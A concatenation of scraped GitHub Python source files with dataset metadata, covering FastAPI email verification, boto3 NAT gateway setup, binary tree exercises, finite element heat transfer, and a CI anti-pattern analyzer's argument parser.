detail="Discord username already set.",
)
capture_message("Discord username already set.")
raise e
try:
table.update(user.airtable_id, {"Discord ID": disc_username})
except:
raise HTTPException(status_code=500, detail="Updating attendee failed")
return user.first_name, user.last_name
@router.get("/{token}")
async def verify_email(token: str, table: Table = Depends(get_registration_table)):
# token is invalid or expired
if not verify_jwt(token):
e = HTTPException(
status_code=403,
detail="Expired or invalid verification link. Please try registering again!",
)
capture_message("Invalid or expired verification link.")
raise e
payload = decode_jwt(token)
attendee_id = payload["id"]
email_type = payload["type"]
if not attendee_id or not email_type:
# token does not contain payload id
e = HTTPException(status_code=403, detail="Invalid verification link.")
capture_message("Invalid verification link.")
raise e
field_name = "Parent Email Verified" if email_type == "parent" else "Email Verified"
try:
attendee = table.update(attendee_id, {field_name: True})
parent_email_verified = (
attendee["fields"]["Parent Email Verified"]
if "Parent Email Verified" in attendee["fields"]
else False
)
email_verified = (
attendee["fields"]["Email Verified"]
if "Email Verified" in attendee["fields"]
else False
)
return {
"parent_email_verified": parent_email_verified,
"email_verified": email_verified,
}
except:
# attendee does not exist
e = HTTPException(status_code=403, detail="Invalid attendee ID.")
capture_message("Invalid attendee ID.")
raise e
| LosAltosHacks/api | app/routers/verify.py | verify.py | py | 3,095 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pyairtable.api.table.Table",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "fastapi.Depends",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "dependen... |
41499034466 | from abc import ABC, abstractmethod
import logging
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.session import Session
from sqlalchemy.pool import NullPool
from os import getenv
from dotenv import load_dotenv
from models import BaseTable
class Collector(ABC):
def __init__(self) -> None:
self.session_factory = SessionHandler()
# set up logging
self.logger = logging.getLogger(__name__)
logging.basicConfig(
level=logging.INFO,
format='%(levelname)s-%(threadName)s: %(message)s'
)
@abstractmethod
def _collect_surfaces(self, bag_building_id: str):
raise NotImplementedError('Implement this')
@abstractmethod
def _collect_images(self, model: BaseTable):
raise NotImplementedError('Implement this')
class SessionHandler:
engine = None
def __init__(self, echo=False):
load_dotenv()
user = getenv('user')
host = getenv('host')
name = getenv('dbname')
self.engine = create_engine(
f'postgresql://{user}:@{host}/{name}',
poolclass=NullPool,
echo=echo
)
def build(self) -> Session:
return sessionmaker(bind=self.engine)()
| shivanrbn/BAG-Visualizer | src/bag_extractor/handler_base.py | handler_base.py | py | 1,286 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "abc.ABC",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "logging.basicConfig",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"lin... |
41702191179 | import os
import pytest
import textwrap
@pytest.fixture()
def sample_test(testdir):
testdir.makefile(
".feature",
scenario=textwrap.dedent(
"""\
Feature: Testing
Scenario: Test scenario
Given I have a scenario
When I start the test
And I know it will fails
Then It fails
"""
),
)
testdir.makepyfile(
textwrap.dedent(
"""\
import pytest
from pytest_bdd import given, when, then, scenario
@scenario("scenario.feature", "Test scenario")
def test_scenario():
pass
@given("I have a scenario")
def _():
pass
@when("I start the test")
def _():
pass
@when("I know it will fails")
def _():
pass
@then('It fails')
def _():
assert False
"""
)
)
return testdir
def test_arguments_in_help(testdir):
res = testdir.runpytest("--help")
res.stdout.fnmatch_lines(
[
"*bdd-report*",
]
)
def test_create_html_report_file(sample_test):
sample_test.runpytest("--bdd-report=report.html")
assert (sample_test.tmpdir / "report.html").exists()
def test_create_html_report_file_with_directory(sample_test):
sample_test.runpytest("--bdd-report=./reports/report.html")
assert (sample_test.tmpdir / "./reports/report.html").exists()
def test_create_html_report_file_with_directory_name(sample_test):
sample_test.runpytest("--bdd-report=results/report.html")
assert (sample_test.tmpdir / "results/report.html").exists()
def test_create_html_report_file_with_directory_and_subdirectory(sample_test):
sample_test.runpytest("--bdd-report=./reports/year/report.html")
assert (sample_test.tmpdir / "./reports/year/report.html").exists()
def test_content_in_report(sample_test):
sample_test.runpytest("--bdd-report=report.html")
content = ""
with open((sample_test.tmpdir / "report.html"), "r") as f:
content = f.read()
assert content != ""
def test_information_in_report(sample_test):
sample_test.runpytest("--bdd-report=report.html")
content = ""
with open((sample_test.tmpdir / "report.html"), "r") as f:
content = f.read()
assert "Testing" in content
assert "Test scenario" in content
assert "I have a scenario" in content
assert "I start the test" in content
assert "I know it will fails" in content
assert " It fails" in content
| mattiamonti/pytest-bdd-report | tests/test_html_information/test_html_information.py | test_html_information.py | py | 2,631 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "textwrap.dedent",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "textwrap.dedent",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pytest.fixture",
"line_number": 7,
"usage_type": "call"
}
] |
17245832907 | import datetime
import inspect
import json
import boto3
from util import create_ec2_client, create_ec2_resource, print_response
def create_elastic_ip(ec2_client):
# https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.allocate_address
# DomainのvpcはVPC、standardはEC2-Classic向け
response = ec2_client.allocate_address(Domain='vpc')
print_response(inspect.getframeinfo(inspect.currentframe())[2], response)
return response['AllocationId']
def create_nat_gateway(ec2_client, allocation_id, subnet_id):
# https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.create_nat_gateway
response = client.create_nat_gateway(
AllocationId=allocation_id,
SubnetId=subnet_id,
)
print_response(inspect.getframeinfo(inspect.currentframe())[2], response)
return response['NatGateway']['NatGatewayId']
def describe_main_route_tables(ec2_client, vpc_id):
# https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.describe_route_tables
response = ec2_client.describe_route_tables(
Filters=[
{
'Name': 'association.main',
'Values': ['true'],
},
{
'Name': 'vpc-id',
'Values': [vpc_id],
}
]
)
main_route_table_id = response['RouteTables'][0]['RouteTableId']
print_response(inspect.getframeinfo(inspect.currentframe())[2], main_route_table_id)
return main_route_table_id
def wait_nat_gateway_available(ec2_client, nat_gateway_id):
# https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Waiter.NatGatewayAvailable
print(f'NAT Gatewayがavailableになるまで待つ(開始):{datetime.datetime.now()}')
waiter = ec2_client.get_waiter('nat_gateway_available')
response = waiter.wait(
Filters=[{
'Name': 'state',
'Values': ['available']
}],
NatGatewayIds=[nat_gateway_id]
)
print_response(inspect.getframeinfo(inspect.currentframe())[2], response)
print(f'NAT Gatewayがavailableになるまで待つ(終了):{datetime.datetime.now()}')
def create_nat_gateway_route_in_route_table(ec2_resource, route_table_id, nat_gateway_id):
# https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.RouteTable.create_route
route_table = ec2_resource.RouteTable(route_table_id)
route = route_table.create_route(
DestinationCidrBlock='0.0.0.0/0',
NatGatewayId=nat_gateway_id,
)
print_response(inspect.getframeinfo(inspect.currentframe())[2], route)
return route
if __name__ == '__main__':
session = boto3.Session(profile_name='my-profile')
# 使用するクライアントとリソースを作成
client = create_ec2_client(session)
resource = create_ec2_resource(session)
# AWSの各IDを取得する
with open('aws.json', mode='r') as f:
aws = json.load(f)
# Elastic IPを取得する
aws['allocation_id'] = create_elastic_ip(client)
# パブリックサブネットにNATゲートウェイを置く
aws['nat_gateway_id'] = create_nat_gateway(client, aws['allocation_id'], aws['public_subnet_id'])
# NATゲートウェイはすぐに使うことができないため、availableになるまで待つ
wait_nat_gateway_available(client, aws['nat_gateway_id'])
# NATゲートウェイのエントリを追加するため、メインのルートテーブルのIDを取得する
aws['main_route_table_id'] = describe_main_route_tables(client, aws['vpc_id'])
# VPC領域2でメインのルートテーブルにNATゲートウェイのエントリを追加する
create_nat_gateway_route_in_route_table(resource, aws['main_route_table_id'], aws['nat_gateway_id'])
# ここまでのid情報をJSONとして上書き保存
with open('aws.json', mode='w') as f:
json.dump(aws, f)
| thinkAmi-sandbox/syakyo-aws-network-server-revised-edition-book | boto3_ansible/ch7.py | ch7.py | py | 3,976 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "util.print_response",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "inspect.getframeinfo",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "inspect.currentframe",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "util.pr... |
74050394344 | from parlai.core.teachers import DialogTeacher
from .build import build
import json
import os
import glob
def _path(opt):
build(opt)
print('opt is', opt['datatype'])
dt = opt['datatype'].split(':')[0]
if dt == 'valid':
dt = 'dev'
elif dt != 'train' and dt != 'test':
raise RuntimeError('Not valid datatype.')
prefix = os.path.join(opt['datapath'], 'nlvr', 'nlvr-master', 'nlvr')
questions_path = os.path.join(prefix, dt, dt + '.json')
images_path = os.path.join(prefix, dt, 'images')
return questions_path, images_path
class DefaultTeacher(DialogTeacher):
# all possile answers for the questions
cands = labels = ['true', 'false']
def __init__(self, opt, shared=None):
self.datatype = opt['datatype']
data_path, self.images_path = _path(opt)
opt['datafile'] = data_path
self.id = 'nlvr'
self.dt = opt['datatype'].split(':')[0]
if self.dt == 'valid':
self.dt = 'dev'
super().__init__(opt, shared)
def label_candidates(self):
return self.cands
def setup_data(self, path):
print('loading: ' + path)
for line in open(path, 'r'):
ques = json.loads(line)
image_path = os.path.join(self.images_path, ques['directory'])
image_file_names = glob.glob(
image_path + '/' + self.dt + '-' + ques['identifier'] + '*'
)
question = "True or False: " + ques['sentence']
answer = [ques['label']] if self.dt != 'test' else None
# print( answer)
yield (question, answer, None, None, image_file_names[0]), True
| facebookresearch/ParlAI | parlai/tasks/nlvr/agents.py | agents.py | py | 1,680 | python | en | code | 10,365 | github-code | 36 | [
{
"api_name": "build.build",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number... |
72517026344 | from setuptools import find_packages, setup
from typing import List
import io
import os
def parse_requirements(filename: str) -> List[str]:
required_packages = []
with open(os.path.join(os.path.dirname(__file__), filename)) as req_file:
for line in req_file:
required_packages.append(line.strip())
return required_packages
setup(
name='ml_pet',
packages=find_packages(),
python_requires=">=3.7",
install_requires=parse_requirements("requirements.txt"),
extras_requires=parse_requirements("requirements-dev.txt"),
version='0.1.0',
description='A python repository of research and utility code for analysis of PET image reconstructions and automatic detection of parathyroid adenomas from [F-18]-FCH PET/CT',
author='Filip Cvetko',
license='MIT',
)
| FilipCvetko/ml_pet | setup.py | setup.py | py | 818 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number... |
15990910311 | from collections import deque
# For debugging
import time
#-----
# Define Node class
#-----
class Node:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
def __repr__(self):
return str(self.val)
#-----
# DFT - recursive
#-----
def dft(root, path=None):
'''Depth-first traversal (recursively). Returns list w/ values in path.'''
if not root:
return path
if not path:
path = []
print(root.val, end=' ')
path.append(root.val)
dft(root.left, path)
dft(root.right, path)
return path
#-----
# DFT - iterative
#-----
def dft_iter(root):
'''Depth-first traversal (iteratively). Returns list w/ values in path.'''
if root is None:
return
stack = [root]
path = []
while stack:
node = stack.pop()
path.append(node.val)
print(node.val, end=' ')
# Note we must add to the stack in *reverse* order to be processed (right then left)
if node.right:
stack.append(node.right)
if node.left:
stack.append(node.left)
return path
#-----
# BFT - iterative
#-----
def bft(root):
'''Breadth-first traversal, or "level-order", of tree'''
if root is None:
return path
queue = deque([root])
path = []
while queue:
node = queue.popleft()
path.append(node.val)
print(node.val, end=' ')
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return path
#-----
# BST insert
#-----
def insert_bst(root, val):
'''Insert new node into BST, returning root node of updated tree'''
if root is None:
return Node(val)
if val < root.val:
root.left = insert_bst(root.left, val)
else:
root.right = insert_bst(root.right, val)
return root
#-----
# BST lookup
#-----
def lookup_bst(root, val):
'''Return first node found with given value'''
if root is None:
print(f'NO value {val} found in tree')
return None
if root.val == val:
print(f'Found value {val} in tree; returning node')
return root
if val < root.val:
return lookup_bst(root.left, val)
else:
return lookup_bst(root.right, val)
#-----
# BST delete
#-----
def delete_bst(root, val, parent=None):
'''Delete first node found with given value; return root of updated tree.'''
# Case: empty tree or val not found
if root is None:
print(f'DEBUG: value {val} not found in tree')
return
if root.val == val:
# Case: leaf
if root.left is None and root.right is None:
# TODO: delete the parent's correct child reference
# TODO: DEBUG this -- fails when parent is null
if parent.val < val:
parent.right = None
else:
parent.left = None
# Case: 1 child
elif root.left is not None:
root.val = root.left.val
root.left = None
elif root.right is not None:
root.val = root.right.val
root.right = None
# Case: 2 children
else:
#replacement_node = find_successor_bst(root.right, val)
delete_bst(root.right, replacement_node.val)
root.val = replacement_node.val
elif val < root.val:
delete_bst(root.left, val, root)
else:
delete_bst(root.right, val, root)
return root
#-----
# Create test tree(s)
#-----
# EXAMPLE TREE 1
#
# 10
# _/ \_
# / \
# 5 15
# / \ / \
# 3 7 13 17
#
node1_1 = Node(5, Node(3), Node(7))
node1_2 = Node(15, Node(13), Node(17))
tree1 = Node(10, node1_1, node1_2)
# EXAMPLE TREE X
#
# 5
# _/ \_
# / \
# 5 5
# / \ \
# 5 5 5
#
#---
# Run & assert correctness of DFT & BFT
# TODO: Add assertions and more test cases
#---
print('Calling dft()...')
assert dft(tree1) == [10, 5, 3, 7, 15, 13, 17]
print('\n')
print('Calling dft_iter()...')
assert dft_iter(tree1) == [10, 5, 3, 7, 15, 13, 17]
print('\n')
print('Calling bft()...')
assert bft(tree1) == [10, 5, 15, 3, 7, 13, 17]
print('\n')
print('Calling insert_bst(tree1, 6)...')
result = insert_bst(tree1, 6)
assert dft(result) == [10, 5, 3, 7, 6, 15, 13, 17]
print('\n')
print('Calling insert_bst(tree1, 20)...')
result = insert_bst(tree1, 20)
assert dft(result) == [10, 5, 3, 7, 6, 15, 13, 17, 20]
print('\n')
print('Calling insert_bst(None, 100)... [case: empty tree passed]')
result = insert_bst(None, 100)
assert dft(result) == [100]
print('\n')
print('Calling lookup_bst(tree1, 13)...')
result_node = lookup_bst(tree1, 13)
assert result_node.val == 13
print('Calling lookup_bst(tree1, 1000)... [case: not found]')
result_node = lookup_bst(tree1, 1000)
assert result_node == None
print('\n')
print('Calling delete_bst(tree1, 13)... [delete leaf (parent\'s left)]')
result_root = delete_bst(tree1, 13)
assert dft(result_root) == [10, 5, 3, 7, 6, 15, 17, 20]
print('\n')
print('Calling delete_bst(tree1, 20)... [delete leaf (parent\'s right)]')
result_root = delete_bst(tree1, 20)
assert dft(result_root) == [10, 5, 3, 7, 6, 15, 17]
print('\n')
print('Calling delete_bst(tree1, 17)... [delete node w/ one child]')
result_root = delete_bst(tree1, 17)
assert dft(result_root) == [10, 5, 3, 7, 6, 15]
print('\n')
print('Calling delete_bst(tree1, 5)... [delete node w/ two children]')
result_root = delete_bst(tree1, 5)
assert dft(result_root) == [10, 3, 7, 6, 15]
print('\n')
print('Calling delete_bst(Node(42), 42)... [delete only node]')
assert delete_bst(Node(42), 42) == None
print('\n')
print('Calling delete_bst(tree1, 42)... [node not found]')
assert delete_bst(tree1, 42) == None
print('\n')
| tylerbittner/interviewkickstart | trees/basic_tree_ops.py | basic_tree_ops.py | py | 5,850 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 62,
"usage_type": "call"
}
] |
709574459 | import numpy as np
import matplotlib.pyplot as plt
import os
import pandas as pd
import csv
### NOTE: Need to make filepaths for the laptop now ###
def lagrange(X):
'''
Function for creating Lagrange basis functions.
Inputs
------
X: array-like. The elements nodal x-locations.
Returns
-------
List of basis functions and a list of their derivatives. This function supports linear
and quadratic basis functions.
'''
deg = len(X)-1
if deg == 1:
x0 = X[0]
x1 = X[1]
x = np.linspace(x0,x1)
phi0 = (x-x1)/(x0-x1)
phi1 = (x-x0)/(x1-x0)
dphi0 = 1/(x0-x1)
dphi1 = 1/(x1-x0)
return [phi0, phi1], [dphi0*np.ones_like(x), dphi1*np.ones_like(x)], x
elif deg ==2:
x0, x1, x2 = X
x = np.linspace(x0,x2)
phi0 = (x-x1)*(x-x2)/((x0-x1)*(x0-x2))
phi1 = (x-x0)*(x-x2)/((x1-x0)*(x1-x2))
phi2 = (x-x0)*(x-x1)/((x2-x0)*(x2-x1))
dphi0 = (2*x-x1-x2)/((x0-x1)*(x0-x2))
dphi1 = (2*x-x0-x2)/((x1-x0)*(x1-x2))
dphi2 = (2*x-x0-x1)/((x2-x0)*(x2-x1))
return [phi0, phi1, phi2], [dphi0, dphi1, dphi2], x
else:
raise ValueError('Currently supporting only first or second order Lagrange basis functions.')
# def read_nodes(file):
# path = os.getcwd()
# if 'mattjwilliams' in path:
# path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
# node_df = pd.read_csv(os.path.join(path,file),delimiter=' ')
# return node_df
def read_file(file):
path = os.getcwd()
if 'mattjwilliams' in path:
path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
else:
path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
df = pd.read_csv(os.path.join(path,file),delimiter=' ')
return df
def mesher1D(xstart,xend,n_elements,deg=1):
if deg == 1:
n_nodes = n_elements + 1
dx = (xend-xstart)/(n_elements)
elements = np.arange(0,n_elements,dtype='int8')
arr = np.zeros((n_elements,deg+2),dtype='object')
node1 = np.arange(xstart,xend,dx)
node2 = np.arange(xstart+dx,xend+dx,dx)
arr[:,0] = elements
arr[:,1] = node1
arr[:,2] = node2
else:
n_nodes = 2*n_elements + 1
dx = (xend-xstart)/(n_elements)
elements = np.arange(0,n_elements,dtype='int8')
arr = np.zeros((n_elements,deg+2),dtype='object')
node1 = np.arange(xstart,xend,dx)
node2 = np.arange(xstart+dx/2,xend+dx/2,dx)
node3 = np.arange(xstart+dx,xend+dx,dx)
arr[:,0] = elements
arr[:,1] = node1
arr[:,2] = node2
arr[:,3] = node3
path = os.getcwd()
if 'mattjwilliams' in path:
path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
else:
path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
fname = 'nodes.txt'
if deg == 1:
headers = ['element','node0','node1']
else:
headers = ['element','node0','node1','node2']
with open(os.path.join(path,fname),'w',newline='') as f:
mywriter = csv.writer(f,delimiter=' ')
mywriter.writerow(headers)
mywriter.writerows(arr)
return None
def element_indexer(n_elements,deg):
arr = np.zeros((n_elements,deg+2),dtype='int8')
arr[:,0] = np.arange(n_elements)
if deg == 1:
arr[:,1] = np.arange(0,n_elements,deg)
arr[:,2] = np.arange(1,n_elements+1,deg)
headers = ['element','node0','node1']
else:
n_nodes = 2*n_elements + 1
arr[:,1] = np.arange(0,n_nodes-1,deg)
arr[:,2] = np.arange(1,n_nodes,deg)
arr[:,3] = np.arange(2,n_nodes+1,deg)
headers = ['element','node0','node1','node2']
path = os.getcwd()
if 'mattjwilliams' in path:
path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
else:
path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
fname = 'elements.txt'
with open(os.path.join(path,fname),'w',newline='') as f:
mywriter = csv.writer(f,delimiter=' ')
mywriter.writerow(headers)
mywriter.writerows(arr)
return None
def global_nodes(xstart,xend,n_elements,deg=1):
if deg == 1:
n_nodes = n_elements + 1
else:
n_nodes = 2*n_elements + 1
arr = np.zeros((n_nodes,2),dtype='object')
arr[:,0] = np.arange(n_nodes)
dx = (xend-xstart)/(n_nodes-1)
arr[:,1] = np.arange(xstart,xend+dx,dx)
path = os.getcwd()
if 'mattjwilliams' in path:
path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
else:
path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
fname = 'global_nodes.txt'
headers = ['global node','x location']
with open(os.path.join(path,fname),'w',newline='') as f:
mywriter = csv.writer(f,delimiter=' ')
mywriter.writerow(headers)
mywriter.writerows(arr)
return None
def boundary_conditions(n_elements,bcs,deg=1):
'''
Boundary conditions passed as a list:
Left end type, left end value, right end type, right end value
Type 1 == Dirichlet, Type 2 == Neumann or flux
'''
type1, val1, type2, val2 = bcs
if deg == 1:
n_nodes = n_elements + 1
else:
n_nodes = 2*n_elements + 1
arr = np.zeros((n_nodes,3),dtype='object')
arr[:,0] = np.arange(n_nodes)
arr[0,1] = type1
arr[0,2] = val1
arr[-1,1] = type2
arr[-1,2] = val2
path = os.getcwd()
if 'mattjwilliams' in path:
path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
else:
path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
fname = 'bcs.txt'
headers = ['global node','type','value']
with open(os.path.join(path,fname),'w',newline='') as f:
mywriter = csv.writer(f,delimiter=' ')
mywriter.writerow(headers)
mywriter.writerows(arr)
return None
def properties(n_elements,k1,k2):
arr = np.zeros((n_elements,2),dtype='object')
if n_elements%2 != 0:
arr[:n_elements//2+1,1] = k1
arr[n_elements//2+1:,1] = k2
arr[:,0] = np.arange(n_elements)
else:
arr[:n_elements//2,1] = k1
arr[n_elements//2:,1] = k2
arr[:,0] = np.arange(n_elements)
path = os.getcwd()
if 'mattjwilliams' in path:
path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
else:
path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
fname = 'elprops.txt'
headers = ['element','kcond']
with open(os.path.join(path,fname),'w',newline='') as f:
mywriter = csv.writer(f,delimiter=' ')
mywriter.writerow(headers)
mywriter.writerows(arr)
return None
if __name__ == '__main__':
### PREPROCESSING SECTION ###
# rod is 100 cm long.
xleft = 0.0
xright = 100.0
n_elements = 8
# degree of basis functions
deg = 2
# set my local working directory for retrieving and saving program files
path = os.getcwd()
if 'mattjwilliams' in path:
path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
else:
path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
fnames = ['nodes.txt','elements.txt','global_nodes.txt','bcs.txt','elprops.txt','globals.txt']
# run functions that create the files containing the mesh information
mesher1D(xleft,xright,n_elements,deg)
element_indexer(n_elements,deg)
global_nodes(xleft,xright,n_elements,deg)
boundary_conditions(n_elements,[2,0.1,1,0.0],deg)
properties(n_elements,0.92,0.12)
# load information from program files into dataframes
df_dict = {}
df_names = ['df_nodes','df_elems','df_glob_nodes','df_bcs','df_elprops','df_globals']
for fname, df_name in zip(fnames,df_names):
df_dict[df_name] = read_file(fname)
### MAIN LOOP ###
n_nodes = n_elements*deg + 1
K = np.zeros((n_nodes,n_nodes))
F = np.zeros(n_nodes)
Tenv, r, kconv = df_dict['df_globals'].iloc[0]
for e in range(n_elements):
node_locs = df_dict['df_nodes'].iloc[e,1:]
N, Nx, xelem = lagrange(node_locs)
kcond = df_dict['df_elprops'].iloc[e]['kcond']
n = len(Nx)
k = np.zeros((n,n))
f = np.zeros(n)
for row in range(n):
I = 2*kconv*Tenv/r*N[row]
f[row] = np.trapz(I,x=xelem)
for col in range(n):
# This currently only has the first integral on the LHS
I1 = Nx[row]*Nx[col]*kcond
I2 = 2*kconv/r*N[row]*N[col]
k[row,col] = np.trapz(I1,x=xelem) + np.trapz(I2,x=xelem)
glob_nodes = df_dict['df_elems'].iloc[e,1:]
for i,row in enumerate(glob_nodes):
F[row] += f[i]
for j,col in enumerate(glob_nodes):
K[row,col] += k[i,j]
for i in range(n_nodes):
bc_type = df_dict['df_bcs'].iloc[i]['type']
if bc_type == 2:
F[i] += df_dict['df_bcs'].iloc[i]['value']
if bc_type == 1:
penalty = abs(K[i,i]+1)*1e7
K[i,i] = penalty
F[i] = df_dict['df_bcs'].iloc[i]['value']*penalty
### END MAIN LOOP ###
### SOLUTION AND POST PROCESSING ###
temps = np.linalg.solve(K,F)
sol = []
xvals = []
for e in range(n_elements):
node_locs = df_dict['df_nodes'].iloc[e,1:]
N, Nx, xelem = lagrange(node_locs)
val_arr = np.zeros_like(xelem)
xvals.append(xelem)
for i in range(deg+1):
val_arr += N[i]*temps[deg*e+i]
sol.append(val_arr)
sol_temps = np.stack(sol).flatten()
sol_xvals = np.stack(xvals).flatten()
plt.plot(sol_xvals,sol_temps)
plt.grid()
plt.xlim(sol_xvals[0],sol_xvals[-1])
plt.ylim(0,30)
plt.xlabel('Distance along bar (cm)')
plt.ylabel('Temperature ($^oC$)')
plt.title(f'FEM Solution with {n_elements} Elements and Degree {deg} Interpolants')
plt.show()
| mattwilliams06/IntroToFEM | Chapter4/HeatTransfer/ProgramScripts/main.py | main.py | py | 10,569 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.linspace",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.ones_like",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.getcwd",
"line_n... |
29775116008 | from orders import get_model
from flask import Blueprint, redirect, render_template, request, url_for
giftcards_crud = Blueprint('giftcards_crud', __name__)
builtin_list = list
# [START list]
@giftcards_crud.route("/")
def list():
token = request.args.get('page_token', None)
if token:
token = token.encode('utf-8')
gcs, next_page_token = get_model().gclist(cursor=token)
return render_template(
"gclist.html",
gcs=gcs,
next_page_token=next_page_token)
# [END list]
# [START view]
@giftcards_crud.route('/<id>')
def view(id):
gc = get_model().gcread(id)
return render_template("gcview.html", gc=gc)
# [START view]
# [START create]
@giftcards_crud.route('/add', methods=['GET', 'POST'])
def add():
if request.method == 'POST':
data = request.form.to_dict(flat=True)
gc = get_model().gccreate(data)
return redirect(url_for('.view', id=gc['id']))
return render_template("gcform.html", action="Add", gc={})
# [END create]
# [START edit]
@giftcards_crud.route('/<id>/edit', methods=['GET', 'POST'])
def edit(id):
gc = get_model().gcread(id)
if request.method == 'POST':
data = request.form.to_dict(flat=True)
gc = get_model().gcupdate(data, id)
return redirect(url_for('.view', id=gc['id']))
return render_template("gcform.html", action="Edit", gc=gc)
# [END edit]
# [START delete]
@giftcards_crud.route('/<id>/delete')
def delete(id):
get_model().gcdelete(id)
return redirect(url_for('.list'))
# [END delete] | rajathithan/flask | orders/giftcards_crud.py | giftcards_crud.py | py | 1,559 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "flask.r... |
40803709725 | import argparse
import datetime
from analyzer.AntiPatterns import find_anti_patterns
from analyzer.config import PROVIDERS, ANTI_PATTERNS
from analyzer.CIDetector import detect_ci_tools
from analyzer.BuildCollector import collect_builds
from analyzer.Output import create_json, create_text_files, create_images
from analyzer.utils import format_date_str
from time import time
# ARGUMENT PARSER
def repository_slug_type(arg):
parsed = arg.split('/')
provider_included = len(parsed) > 2
# provider is included in slug
if provider_included:
known_provider = parsed[0] in PROVIDERS
else:
known_provider = True
if known_provider and len(parsed) >= 2:
return arg
else:
raise argparse.ArgumentTypeError(
f"Unknown provider '{parsed[0]}'" if known_provider else f"Invalid slug '{arg}'"
)
def provider_type(p):
if p in PROVIDERS:
return p
raise argparse.ArgumentTypeError(
f"Unknown provider type '{p}' allowed values are '{PROVIDERS}'"
)
def antipattern_type(a):
if a in ANTI_PATTERNS:
return a
raise argparse.ArgumentTypeError(
f"Unknown anti-pattern '{a}', allowed values are '{ANTI_PATTERNS}'"
)
def start_date_type(d):
try:
d = datetime.datetime.strptime(d, "%Y-%m-%d")
return format_date_str(d)
except ValueError:
print(f"'{d}' is not in the format YYYY-MM-DD, using no date instead...")
return None
parser = argparse.ArgumentParser()
parser.add_argument('repository_slugs', nargs='+', type=repository_slug_type,
help='One or more repository slugs. A slug is constructed as follows:'
'[{provider}/]{username}/{repository_name}'
'The provider is optional. If none is given, the default provider is assumed (see -p)')
parser.add_argument('-p', '--default-provider', default='github', type=provider_type,
help=f'Default provider. Allowed values are {PROVIDERS}')
parser.add_argument('-do', '--detect-only', action='store_true', default=False,
help='Only detect CI tools in the specified repositories')
parser.add_argument('-a', '--anti-patterns', nargs='+', type=antipattern_type,
help=f'Select anti-patterns to detect, allowed values are {ANTI_PATTERNS}')
parser.add_argument('-nc', '--no-cache', action='store_true', default=False,
help='Use this flag to disable cache usage')
parser.add_argument('-ncc', '--no-create-cache', action='store_true', default=False,
help='Use this flag to disable cache creation')
parser.add_argument('-od', '--out-dir', type=str, help='Output path')
